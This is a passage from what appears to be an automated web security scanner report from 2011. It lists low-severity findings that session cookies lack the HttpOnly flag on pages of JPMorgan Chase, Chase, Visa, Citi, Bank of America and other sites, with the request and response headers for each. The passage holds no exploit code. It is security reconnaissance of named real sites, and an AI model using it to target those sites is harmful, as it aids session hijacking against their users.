Host:   http://careers.jpmorganchase.com
Path:   /career/careerhome

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /career/careerhome HTTP/1.1
Host: careers.jpmorganchase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 00:08:20 GMT
Cache-Control: no-cache="set-cookie"
Content-Type: text/html; charset=UTF-8
HOST_SERVICE: FutureTenseContentServer:6.3.0
Set-Cookie: JpmcSession=TzkVNJxJQrS0gzJv15V8Vrx2QzN9B6kLwsGv8cCv6MNQVGfj6sk1!-872331758; path=/
X-Powered-By: Servlet/2.4 JSP/2.0
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Connection: close


                                                           <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>


<link href="../CSS/code/white4.css" re
...[SNIP]...

11.3. https://chaseonline.chase.com/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://chaseonline.chase.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: chaseonline.chase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 17909
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=363a4a0a-9240-4195-9a73-ca0f1962dd7b; domain=.chase.com; path=/
Cache-Control: no-cache=Set-Cookie
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Set-Cookie: v1st=5BE36DBE8BA5F8DB; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.chase.com
Date: Wed, 02 Feb 2011 22:02:00 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/>
<meta http-equiv="Pragma" content="no-cache"/
...[SNIP]...

11.4. http://chat.livechatinc.net/licence/1043255/script.cgi  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://chat.livechatinc.net
Path:   /licence/1043255/script.cgi

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /licence/1043255/script.cgi?lang=en&groups=0 HTTP/1.1
Host: chat.livechatinc.net
Proxy-Connection: keep-alive
Referer: http://www.invisionpower.com/products/board/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-type: application/x-javascript;
Set-Cookie: lc_session=S1296685494.aa93f77b42&lc_last_visit=1296685494&lc_visit_number=1&lc_page_view=1&lc_nick=$&lc_chat_number=0&lc_all_invitation=0&lc_ok_invitation=0&lc_last_operator_id=$&lc_client_version=$&lc_last_conference_id=$&lc_lang=en; expires=Fri, 01-Feb-2013 23:24:54 GMT; domain=chat.livechatinc.net;
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 11722
Connection: Keep-Alive

if(typeof __lc_loaded=='undefined'){var __lc_loaded=true;
eval((function(s){var a,c,e,i,j,o="",r,t=".......................@`~";for(i=0;i<s.length;i++){r=t+s[i][2];a=s[i][1].split(".");for(j=a.length
...[SNIP]...

11.5. http://corporate.visa.com/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://corporate.visa.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: corporate.visa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Cache-Control: no-cache="set-cookie, set-cookie2"
Content-Length: 1
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Location: http://corporate.visa.com/index.shtml
Server: Microsoft-IIS/7.0
Set-Cookie: JSESSIONID=0000YtlhLIMmJl1VCsvpbNXs8nD:13l7m9kr7; Path=/
Server: WebSphere Application Server/6.1
Date: Wed, 02 Feb 2011 21:59:39 GMT



11.6. http://data.coremetrics.com/cm  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://data.coremetrics.com
Path:   /cm

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /cm HTTP/1.1
Host: data.coremetrics.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Wed, 02 Feb 2011 22:45:01 GMT
Server: Apache
P3P: CP="NON DSP COR CUR ADMo DEVo PSAo PSDo OUR IND ONL UNI PUR COM NAV INT DEM STA"
Set-Cookie: CoreID6=70221296686701068830717; path=/; expires=Sun, 01 Feb 2026 22:45:01 GMT
Set-Cookie: TestSess3=70221296686701068830717;path=/
Location: /cm?cvdone=p
Keep-Alive: timeout=300, max=988
Connection: Keep-Alive
Content-Type: text/plain; charset=UTF-8
Content-Length: 0


11.7. http://fis.com/fis/worldnews/worldnews.asp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://fis.com
Path:   /fis/worldnews/worldnews.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /fis/worldnews/worldnews.asp HTTP/1.1
Host: fis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 03 Feb 2011 00:54:33 GMT
Connection: close
Content-Length: 83533
Content-Type: text/html
Set-Cookie: ASPSESSIONIDCASTCAST=LKGBFPGBNACCBLIDDPHBHANM; path=/
Cache-control: private


<html>
<head>
   <meta http-equiv="content-type" content="text/html; charset=UTF-8">
   <meta http-equiv="refresh" content="1800">
   <title>FIS - Worldnews - Icelandic Group still up for grabs</title
...[SNIP]...

11.8. http://icg.citi.com/icg/global_banking/index.jsp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://icg.citi.com
Path:   /icg/global_banking/index.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /icg/global_banking/index.jsp HTTP/1.1
Host: icg.citi.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: ""
Date: Wed, 02 Feb 2011 22:11:31 GMT
Content-type: text/html; charset=ISO-8859-1
Cache-Control: no-cache="Set-Cookie"
Set-Cookie: JSESSIONID=pmRyNJWTrlhWs4CMfhxWwsp80LHT4LhB6XJg6bHB5JvPWnb5GRyz!-455328445; path=/
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<!-- template version 2.5 -->

<html><!-- InstanceBegin template="/Templates/temp
...[SNIP]...

11.9. http://icg.citi.com/icg/global_markets/index.jsp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://icg.citi.com
Path:   /icg/global_markets/index.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /icg/global_markets/index.jsp HTTP/1.1
Host: icg.citi.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: ""
Date: Wed, 02 Feb 2011 22:11:31 GMT
Content-type: text/html; charset=ISO-8859-1
Cache-Control: no-cache="Set-Cookie"
Set-Cookie: JSESSIONID=hKTpNJWTyzHxTpySqDY5L1tn7Xt0pH1zvGG6h2GrTDnnCgT2GD8y!-455328445; path=/
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<!-- template version 2.5 -->

<html><!-- InstanceBegin template="/Templates/temp
...[SNIP]...

11.10. http://insidejapantours.com/japan-news/1671/tuna-costs-254-000-in-japan/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://insidejapantours.com
Path:   /japan-news/1671/tuna-costs-254-000-in-japan/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /japan-news/1671/tuna-costs-254-000-in-japan/ HTTP/1.1
Host: insidejapantours.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=ISO-8859-1
Set-Cookie: CSPSESSIONID-SP-80=00000001000039bv9MU3000000HVqGoe$mkIhY9X0_5aueuw--; path=/;
CACHE-CONTROL: no-cache
CONNECTION: Close
DATE: Thu, 03 Feb 2011 01:02:54 GMT
EXPIRES: Thu, 29 Oct 1998 17:04:19 GMT
PRAGMA: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD Xhtml 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<link rel="alternate" type="application/rss+xml" title="Japan
...[SNIP]...

11.11. http://ipboard-software.software.informer.com/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://ipboard-software.software.informer.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: ipboard-software.software.informer.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Thu, 03 Feb 2011 01:02:55 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=kvc2qv4jlhknajb7ks0pmmn6m3; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 17619

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <meta http-equiv="Con
...[SNIP]...

11.12. http://learn.bankofamerica.com/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://learn.bankofamerica.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: learn.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:11:32 GMT
Server: Apache
Set-Cookie: JSESSIONID=2EDDFC892370188D9E9AEDDCC332827E; Path=/
Content-Language: en-US
Age: 7065
Content-Length: 18942
Keep-Alive: timeout=2, max=39
Connection: Keep-Alive
Content-Type: text/html;charset=UTF-8
Set-Cookie: NSC_mfbso.cbolpgbnfsjdb.dpn=44922ab53660;expires=Wed, 02-Feb-11 23:11:32 GMT;path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" lang="en-US"><head><title>Personal F
...[SNIP]...

11.13. http://locators.bankofamerica.com/locator/gen3loc/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://locators.bankofamerica.com
Path:   /locator/gen3loc/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /locator/gen3loc/ HTTP/1.1
Host: locators.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 02 Feb 2011 22:10:53 GMT
Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8e-fips-rhel5 mod_jk/1.2.26
Set-Cookie: JSESSIONID=1855EA832F144EB2386254CA5EA62C0D.ftb-web3; Path=/locator/gen3loc
Pragma: no-cache
cache-control: no-store
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/gen3loc
Location: http://locators.bankofamerica.com/locator/gen3loc/jsp/index.jsp?shouldTest=true
Content-Language: en-US
Content-Length: 0
Connection: close
Content-Type: text/plain


11.14. http://locators.bankofamerica.com/locator/locator/LocatorAction.do  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://locators.bankofamerica.com
Path:   /locator/locator/LocatorAction.do

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /locator/locator/LocatorAction.do HTTP/1.1
Host: locators.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 02 Feb 2011 22:10:44 GMT
Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8e-fips-rhel5 mod_jk/1.2.26
Set-Cookie: JSESSIONID=DB67375326A3DF6B103B3EB5CE101EA1.ftb-web1; Path=/locator/locator
Pragma: no-cache
cache-control: no-store
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator
Location: http://locators.bankofamerica.com/locator/locator/LocatorAction.do?shouldTest=true
Content-Language: en-US
Content-Length: 0
Connection: close
Content-Type: text/plain


11.15. http://lovely-faces.com/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://lovely-faces.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: lovely-faces.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 20:21:13 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, max-age=900, pre-check=900
Vary: Accept-Encoding
Set-Cookie: PHPSESSID=d2m29fhd3k250v7inbf5p7la41; path=/
Last-Modified: Sat, 05 Feb 2011 09:23:34 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 30648

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=U
...[SNIP]...

11.16. http://m.usa.visa.com/m/assistance/access.jsp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://m.usa.visa.com
Path:   /m/assistance/access.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /m/assistance/access.jsp HTTP/1.1
Host: m.usa.visa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache="set-cookie, set-cookie2"
Content-Length: 2957
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: JSESSIONID=00017PTaTqr64hoPCKncf_CR42G:-1042HAI; Path=/
Server: Web2
Date: Wed, 02 Feb 2011 22:00:01 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<head>
<meta ht
...[SNIP]...

11.17. http://m.usa.visa.com/m/assistance/contact.jsp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://m.usa.visa.com
Path:   /m/assistance/contact.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /m/assistance/contact.jsp HTTP/1.1
Host: m.usa.visa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache="set-cookie, set-cookie2"
Content-Length: 7325
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: JSESSIONID=0001eta3hA9DoZXIPs04uLdlCEC:-1042HAI; Path=/
Server: Web2
Date: Wed, 02 Feb 2011 22:00:01 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<head>
<meta ht
...[SNIP]...

11.18. http://m.usa.visa.com/m/assistance/index.jsp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://m.usa.visa.com
Path:   /m/assistance/index.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /m/assistance/index.jsp HTTP/1.1
Host: m.usa.visa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache="set-cookie, set-cookie2"
Content-Length: 3055
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: JSESSIONID=0001Gy0Aop96MsFElvz576vJl5E:-1042HAI; Path=/
Server: Web2
Date: Wed, 02 Feb 2011 21:59:59 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<head>
<meta ht
...[SNIP]...

11.19. http://m.usa.visa.com/m/assistance/lost.jsp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://m.usa.visa.com
Path:   /m/assistance/lost.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /m/assistance/lost.jsp HTTP/1.1
Host: m.usa.visa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache="set-cookie, set-cookie2"
Content-Length: 28817
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: JSESSIONID=0001adTeLbI5vDToIoqioYMrI8g:-1042HAI; Path=/
Server: Web2
Date: Wed, 02 Feb 2011 22:00:00 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<head>
<meta
...[SNIP]...

11.20. http://m.usa.visa.com/m/cards/buxx.jsp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://m.usa.visa.com
Path:   /m/cards/buxx.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /m/cards/buxx.jsp HTTP/1.1
Host: m.usa.visa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache="set-cookie, set-cookie2"
Content-Length: 5245
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: JSESSIONID=0001C430xoshVnZkjG8KlhbBQjL:-1042HAI; Path=/
Server: Web2
Date: Wed, 02 Feb 2011 21:59:48 GMT

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//WAPFORUM//DTD XHTML Mobile 1.1//EN" "http://www.openmobilealliance.org/tech/DTD/xhtml-mobile11.dtd">
<html xmlns="http://www.w3.org/
...[SNIP]...

11.21. http://m.usa.visa.com/m/cards/credit.jsp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://m.usa.visa.com
Path:   /m/cards/credit.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /m/cards/credit.jsp HTTP/1.1
Host: m.usa.visa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache="set-cookie, set-cookie2"
Content-Length: 4728
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: JSESSIONID=0001J8MkcqBjhHzx1xkGye--WzE:11K8IRU98V; Path=/
Server: Web2
Date: Wed, 02 Feb 2011 21:59:47 GMT

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//WAPFORUM//DTD XHTML Mobile 1.1//EN" "http://www.openmobilealliance.org/tech/DTD/xhtml-mobile11.dtd">
<html xmlns="http://www.w3.org/
...[SNIP]...

11.22. http://m.usa.visa.com/m/cards/debit.jsp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://m.usa.visa.com
Path:   /m/cards/debit.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /m/cards/debit.jsp HTTP/1.1
Host: m.usa.visa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache="set-cookie, set-cookie2"
Content-Length: 6782
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: JSESSIONID=0001Ux2C2iT5gxRwmHPqbypwFGg:11K8IRU98V; Path=/
Server: Web2
Date: Wed, 02 Feb 2011 21:59:53 GMT

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//WAPFORUM//DTD XHTML Mobile 1.1//EN" "http://www.openmobilealliance.org/tech/DTD/xhtml-mobile11.dtd">
<html xmlns="http://www.w3.org/
...[SNIP]...

11.23. http://m.usa.visa.com/m/cards/gift.jsp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://m.usa.visa.com
Path:   /m/cards/gift.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /m/cards/gift.jsp HTTP/1.1
Host: m.usa.visa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache="set-cookie, set-cookie2"
Content-Length: 4556
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: JSESSIONID=0001xbaVCh7MAT5ZZYdNDCcodfY:-1042HAI; Path=/
Server: Web2
Date: Wed, 02 Feb 2011 21:59:48 GMT

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//WAPFORUM//DTD XHTML Mobile 1.1//EN" "http://www.openmobilealliance.org/tech/DTD/xhtml-mobile11.dtd">
<html xmlns="http://www.w3.org/
...[SNIP]...

11.24. http://m.usa.visa.com/m/cards/index.jsp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://m.usa.visa.com
Path:   /m/cards/index.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /m/cards/index.jsp HTTP/1.1
Host: m.usa.visa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache="set-cookie, set-cookie2"
Content-Length: 5017
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: JSESSIONID=00013rltRd4RSwkaoBOa6Rxw4hg:-1042HAI; Path=/
Server: Web2
Date: Wed, 02 Feb 2011 21:59:46 GMT

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//WAPFORUM//DTD XHTML Mobile 1.1//EN" "http://www.openmobilealliance.org/tech/DTD/xhtml-mobile11.dtd">
<html xmlns="http://www.w3.org/
...[SNIP]...

11.25. http://m.usa.visa.com/m/cards/prepaid.jsp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://m.usa.visa.com
Path:   /m/cards/prepaid.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /m/cards/prepaid.jsp HTTP/1.1
Host: m.usa.visa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache="set-cookie, set-cookie2"
Content-Length: 5576
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: JSESSIONID=0001j4NjcvkrkbyW7cCAxOTFT-z:11K8IRU98V; Path=/
Server: Web2
Date: Wed, 02 Feb 2011 21:59:48 GMT

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//WAPFORUM//DTD XHTML Mobile 1.1//EN" "http://www.openmobilealliance.org/tech/DTD/xhtml-mobile11.dtd">
<html xmlns="http://www.w3.org/
...[SNIP]...

11.26. http://m.usa.visa.com/m/cards/readylink.jsp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://m.usa.visa.com
Path:   /m/cards/readylink.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /m/cards/readylink.jsp HTTP/1.1
Host: m.usa.visa.com
